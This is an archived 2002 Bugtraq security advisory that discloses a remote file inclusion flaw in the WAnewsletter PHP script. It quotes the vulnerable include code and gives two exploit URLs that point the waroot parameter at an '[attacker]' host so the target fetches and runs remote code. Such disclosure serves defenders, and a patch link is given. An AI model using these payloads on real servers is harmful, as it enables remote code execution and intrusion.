[28256] in bugtraq
WAnewsletter (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Thu Dec 19 11:40:40 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Thu, 19 Dec 2002 16:19:52 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F35z0wTqNL6kBKrsKYZ000145ff@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Website : http://www.phpcodeur.net
Versions : 2.0beta -> 2.1.0
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
newsletter.php 2.1beta -> 2.1.0 :
----------------------------------------------------
if( !empty($HTTP_POST_VARS['action']) )
{
$action = $HTTP_POST_VARS['action'];
}
else if( !empty($HTTP_GET_VARS['action']) )
{
$action = $HTTP_GET_VARS['action'];
}
else
{
$action = '';
}
if( $action != '' || defined('IN_WA_FORM') )
{
$login = false;
include_once($waroot . 'start.php');
}
[...]
----------------------------------------------------
sql/db_type.php 2.0.2 -> 2.1.0 :
----------------------------------------
switch($dbtype)
{
case 'mysql':
include_once($waroot . 'sql/mysql/mysql.inc.php');
break;
case 'mssql':
include_once($waroot . 'sql/mssql/mssql.inc.php');
break;
default:
echo '<b>Le type de base de données n\'est pas défini !</b>';
exit;
break;
}
[...]
----------------------------------------
etc...
Exploits :
°°°°°°°°°°
http://[target]/newsletter.php?action=1&waroot=http://[attacker]/
http://[target]/sql/db_type.php?waroot=http://[attacker]/
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org .
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WAnewsletter.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWAnewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
